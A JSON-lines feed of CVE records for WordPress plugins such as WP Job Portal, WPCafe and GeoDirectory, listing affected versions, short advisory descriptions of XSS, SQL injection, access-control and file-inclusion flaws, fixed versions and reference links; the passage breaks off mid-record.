{"CVE_ID":"CVE-2023-0219","slug":"fluent-smtp","versionEndExcluding":"2.2.3","description":"The FluentSMTP WordPress plugin before 2.2.3 does not sanitize or escape email content, making it vulnerable to stored cross-site scripting attacks (XSS) when an administrator views the email logs. This exploit requires other plugins to enable users to send emails with unfiltered HTML.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71662b72-311c-42db-86c5-a0276d25535c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71662b72-311c-42db-86c5-a0276d25535c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8983","slug":"custom-twitter-feeds","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"Custom Twitter Feeds  WordPress plugin before 2.2.3 is not filtering some of its settings allowing high privilege users to inject scripts.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/29194dde-8d11-4096-a5ae-1d69c2c5dc33\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/29194dde-8d11-4096-a5ae-1d69c2c5dc33\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11715","slug":"wp-job-portal","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the assignUserRole() function in all versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to elevate their privileges to that of an employer.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/tvnnn\\\/9b706643c5f88989c98815be8b101e11\",\"name\":\"https:\\\/\\\/gist.github.com\\\/tvnnn\\\/9b706643c5f88989c98815be8b101e11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/user\\\/controller.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fuser%2Fcontroller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/user\\\/controller.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fuser%2Fcontroller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4107199d-e3c7-4379-b39d-1868de7d777b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4107199d-e3c7-4379-b39d-1868de7d777b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11714","slug":"wp-job-portal","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'ff' parameter of the getFieldsForVisibleCombobox() function in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/60182158e1d763b2f4c3b5e2972b6961#file-fieldordering_model-php-L6\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/60182158e1d763b2f4c3b5e2972b6961#file-fieldordering_model-php-L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/fieldordering\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Ffieldordering%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/fieldordering\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Ffieldordering%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/505858dc-c420-484c-a067-6962836eea6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/505858dc-c420-484c-a067-6962836eea6a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11713","slug":"wp-job-portal","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'page_id' parameter of the wpjobportal_deactivate() function in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/08ea67adc67d1ba98bf56c4fae5aec0f#file-deactivation-php-L11\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/08ea67adc67d1ba98bf56c4fae5aec0f#file-deactivation-php-L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/includes\\\/deactivation.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fincludes%2Fdeactivation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/includes\\\/deactivation.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fincludes%2Fdeactivation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d67675a-b77b-41c6-a94f-d9385e609b37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d67675a-b77b-41c6-a94f-d9385e609b37?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11712","slug":"wp-job-portal","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the getResumeFileDownloadById() function in all versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to download other users resumes.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/245d2829c1b489f61c9124086506b6b8\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/245d2829c1b489f61c9124086506b6b8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/7a26a9681eb3413d8be9323fb151fdcd\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/7a26a9681eb3413d8be9323fb151fdcd\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/resume\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fresume%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/resume\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fresume%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecc87d5f-dba4-40f8-946f-f2634614b579?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecc87d5f-dba4-40f8-946f-f2634614b579?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11711","slug":"wp-job-portal","versionImpact":"2.2.1","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'resumeid' parameter in all versions up to, and including, 2.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/b388ef3b4ff57c69f719c363d7fea399#file-resume_model-php-L35\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/b388ef3b4ff57c69f719c363d7fea399#file-resume_model-php-L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/resume\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fresume%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/resume\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Fresume%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d8961fd-68ac-4a10-ab26-cfcda27c18e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d8961fd-68ac-4a10-ab26-cfcda27c18e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11710","slug":"wp-job-portal","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'fieldfor', 'visibleParent' and 'id' parameters in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/40e061bbd2aa26bb89060aff7879feb1\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/40e061bbd2aa26bb89060aff7879feb1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/fieldordering\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Ffieldordering%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202327\\\/wp-job-portal\\\/tags\\\/2.2.3\\\/modules\\\/fieldordering\\\/model.php?old=3187129&old_path=wp-job-portal%2Ftags%2F2.2.2%2Fmodules%2Ffieldordering%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80fcaea8-5837-4d8c-afef-b9ed4fd31227?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80fcaea8-5837-4d8c-afef-b9ed4fd31227?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6570","slug":"glossary-by-codeat","versionImpact":"2.2.26","versionEndExcluding":"2.2.27","description":"The Glossary plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.2.26. This is due the plugin utilizing wpdesk and not preventing direct access to the test files along with display_errors being enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.2.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/593b2ea2-0627-45ce-b672-cc815bff338b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/593b2ea2-0627-45ce-b672-cc815bff338b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118151%40glossary-by-codeat&new=3118151%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118151%40glossary-by-codeat&new=3118151%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3116892%40glossary-by-codeat&new=3116892%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3116892%40glossary-by-codeat&new=3116892%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3116269%40glossary-by-codeat&new=3116269%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3116269%40glossary-by-codeat&new=3116269%40glossary-by-codeat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0895","slug":"3d-flipbook-dflip-lite","versionImpact":"2.2.26","versionEndExcluding":"2.2.27","description":"The PDF Flipbook, 3D Flipbook \u2013 DearFlip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via outline settings in all versions up to, and including, 2.2.26 due to insufficient input sanitization and output escaping on user supplied data. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/inc\\\/metaboxes.php#L483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-flipbook-dflip-lite\\\/trunk\\\/inc\\\/metaboxes.php#L483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5431","slug":"wp-cafe","versionImpact":"2.2.25","versionEndExcluding":"2.2.26","description":"The WPCafe \u2013 Online Food Ordering, Restaurant Menu, Delivery, and Reservations for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.2.25 via the reservation_extra_field shortcode parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include remote files on the server, potentially resulting in code execution","recommendation":"Update to version 2.2.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c5e7ed1-7eb8-4ce7-9dd6-0f7937b6f671?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c5e7ed1-7eb8-4ce7-9dd6-0f7937b6f671?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/tags\\\/2.2.25\\\/core\\\/shortcodes\\\/views\\\/reservation\\\/reservation-form-template.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/tags\\\/2.2.25\\\/core\\\/shortcodes\\\/views\\\/reservation\\\/reservation-form-template.php#L178\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1855","slug":"wp-cafe","versionImpact":"2.2.23","versionEndExcluding":"2.2.24","description":"The WPCafe \u2013 Restaurant Menu, Online Ordering for WooCommerce, Pickup \/ Delivery and Table Reservation plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.2.23 via the wpc_check_for_submission function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application.","recommendation":"Update to version 2.2.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f83c19e-1b75-4fea-b4de-f7f844a449c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f83c19e-1b75-4fea-b4de-f7f844a449c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/trunk\\\/core\\\/action\\\/wpc-ajax-action.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cafe\\\/trunk\\\/core\\\/action\\\/wpc-ajax-action.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084054\\\/wp-cafe\\\/trunk\\\/core\\\/action\\\/wpc-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084054\\\/wp-cafe\\\/trunk\\\/core\\\/action\\\/wpc-ajax-action.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0278","slug":"geodirectory","versionEndExcluding":"2.2.24","description":"The GeoDirectory WordPress plugin before 2.2.24 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/98deb84e-01ca-4b70-a8f8-0a226daa85a6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/98deb84e-01ca-4b70-a8f8-0a226daa85a6\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/geodirectory_2-2-21\",\"name\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/geodirectory_2-2-21\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4398","slug":"html5-audio-player","versionImpact":"2.2.19","versionEndExcluding":"2.2.22","description":"The HTML5 Audio Player- Best WordPress Audio Player Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.2.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca646202-b9e2-4272-b0e2-d39cd748fb8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca646202-b9e2-4272-b0e2-d39cd748fb8e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/Elementor\\\/Widgets\\\/Simple.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/Elementor\\\/Widgets\\\/Simple.php#L237\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/fusion-audio-player.php#L275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/fusion-audio-player.php#L275\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/stamp-audio-player.php#L286\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/stamp-audio-player.php#L286\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/playlist.php#L541\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-audio-player\\\/trunk\\\/inc\\\/elementor-widgets\\\/playlist.php#L541\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4775","slug":"geodirectory","versionEndExcluding":"2.2.22","description":"The GeoDirectory WordPress plugin before 2.2.22 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ab3fc58-7d1c-4bcd-8bbd-86c62a3f979c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ab3fc58-7d1c-4bcd-8bbd-86c62a3f979c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13449","slug":"boom-fest","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Boom Fest plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'bf_admin_action' function in all versions up to, and including, 2.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin settings that change the appearance of the website.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boom-fest\\\/trunk\\\/admin\\\/class-boom-fest-admin.php#L174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boom-fest\\\/trunk\\\/admin\\\/class-boom-fest-admin.php#L174\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227296\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227296\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/246a66ea-7f2f-44e6-825b-5556eacc33ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/246a66ea-7f2f-44e6-825b-5556eacc33ab?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4483","slug":"email-encoder-bundle","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Email Encoder  WordPress plugin before 2.2.2 does not escape the WP_Email_Encoder_Bundle_options[protection_text] parameter before outputting it back in an attribute in an admin page, leading to a Stored Cross-Site Scripting","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f2ac76c-f3f8-41f9-a32a-f414825cf6f1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f2ac76c-f3f8-41f9-a32a-f414825cf6f1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"popup-box","versionEndExcluding":"2.2.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6256","slug":"feeds-for-youtube","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The Feeds for YouTube (YouTube video, channel, and gallery plugin) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'youtube-feed' shortcode in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/228fab65-e5c2-41d1-ad41-fac4862894f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/228fab65-e5c2-41d1-ad41-fac4862894f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feeds-for-youtube\\\/trunk\\\/js\\\/sb-youtube.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feeds-for-youtube\\\/trunk\\\/js\\\/sb-youtube.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107577\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107577\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11361","slug":"pdf-invoicing-for-woocommerce","versionImpact":"2.2.1","versionEndExcluding":"2.2.2","description":"The PDF Invoices & Packing Slips Generator for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoicing-for-woocommerce\\\/tags\\\/2.2.1\\\/includes\\\/class-alg-wc-pdf-invoicing-admin.php#L213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoicing-for-woocommerce\\\/tags\\\/2.2.1\\\/includes\\\/class-alg-wc-pdf-invoicing-admin.php#L213\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoicing-for-woocommerce\\\/tags\\\/2.2.1\\\/includes\\\/class-alg-wc-pdf-invoicing-admin.php#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoicing-for-woocommerce\\\/tags\\\/2.2.1\\\/includes\\\/class-alg-wc-pdf-invoicing-admin.php#L244\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194265%40pdf-invoicing-for-woocommerce&new=319426